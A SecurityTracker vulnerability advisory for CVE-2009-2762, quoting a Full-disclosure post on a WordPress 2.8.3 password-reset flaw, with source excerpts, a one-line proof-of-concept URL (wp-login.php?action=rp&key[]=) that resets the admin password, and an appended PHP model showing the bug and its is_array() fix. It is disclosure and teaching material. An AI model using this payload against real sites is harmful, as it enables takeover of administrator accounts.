SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   WordPress
Vendors:   wordpress.org
WordPress Input Validation Bug Lets Remote Users Reset the Administrative Password
SecurityTracker Alert ID:  1022707
SecurityTracker URL:  http://securitytracker.com/id/1022707
CVE Reference:   CVE-2009-2762
Updated:  Aug 15 2009
Original Entry Date:  Aug 11 2009
Impact:   Modification of authentication information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.8 - 2.8.3
Description:   A vulnerability was reported in WordPress. A remote user can reset the administrative password.

A remote user can send an empty array for the activation 'key' parameter to the 'wp-login.php' script to cause the specified account's password to be reset without confirmation.

A demonstration exploit is provided:

http://[target]/wp-login.php?action=rp&key[]=

Laurent Gaffie reported this vulnerability.

Impact:   A remote user can reset the administrative password.
Solution:   The vendor has issued a source code fix, available at:

http://core.trac.wordpress.org/changeset/11798

Vendor URL:  www.wordpress.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

===============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
===============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:
You submit your email address or username via this form
/wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like this via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress resets your admin password, and
sends you another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
...[snip]...

You can abuse the password reset function, bypass the first step and
then reset the admin password by submitting an array to the $key variable.


IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch available for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great research
on PHP, as for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.



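The bug the advisory above walks through, as an added example that is not WordPress code: a cut-down PHP model of reset_password() from wp-login.php (2.8.3) next to the is_array() check that changeset 11798 added. FakeWpdb is an assumption that mimics only the two wpdb behaviours that matter here (prepare() unpacking a lone array argument, and a constructed user table in which admin has no pending activation key).

```php
<?php
// Added example, not WordPress code: a cut-down model of reset_password()
// from wp-login.php (2.8.3) beside the check added in changeset 11798.
// FakeWpdb is an assumption that mimics only two wpdb behaviours.
class FakeWpdb {
    public $users = 'wp_users';

    // Like wpdb::prepare(): a lone array argument is unpacked into the
    // vsprintf() argument list, so array('') becomes the literal ''.
    public function prepare($query) {
        $args = array_slice(func_get_args(), 1);
        if (isset($args[0]) && is_array($args[0])) {
            $args = $args[0];
        }
        $query = str_replace('%s', "'%s'", $query);
        return vsprintf($query, array_map('addslashes', $args));
    }

    // Constructed user table: admin has no pending reset, so its
    // user_activation_key is '' (the normal state of every account).
    public function get_row($sql) {
        $rows = array(array('ID' => 1, 'user_login' => 'admin', 'user_activation_key' => ''));
        foreach ($rows as $row) {
            $match = "SELECT * FROM wp_users WHERE user_activation_key = '{$row['user_activation_key']}'";
            if ($sql === $match) {
                return (object) $row;
            }
        }
        return null;
    }
}
// Returns the login whose password would be reset, or the error code.
function reset_password_model($key, $fixed) {
    $wpdb = new FakeWpdb();
    // preg_replace() maps over an array subject and returns an array,
    // and empty(array('')) is false, so key[]= passes the original check.
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if (empty($key) || ($fixed && is_array($key)))
        return 'invalid_key';
    $user = $wpdb->get_row($wpdb->prepare(
        "SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if (empty($user))
        return 'invalid_key';
    return $user->user_login;   // 2.8.3 goes on to issue a new password here
}

var_dump(reset_password_model(array(''), false));  // "admin": ?key[]= reaches the reset
var_dump(reset_password_model(array(''), true));   // "invalid_key": rejected by is_array()
var_dump(reset_password_model('o7naCKN3OoeU2KJMMsag', false)); // "invalid_key": no such key
```

The same type-confusion applies to any PHP handler that runs a scalar check such as empty() on a request parameter and then hands it to a query builder, which is why rejecting array-typed input at the boundary is the general fix.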
Copyright 2019, SecurityGlobal.net LLC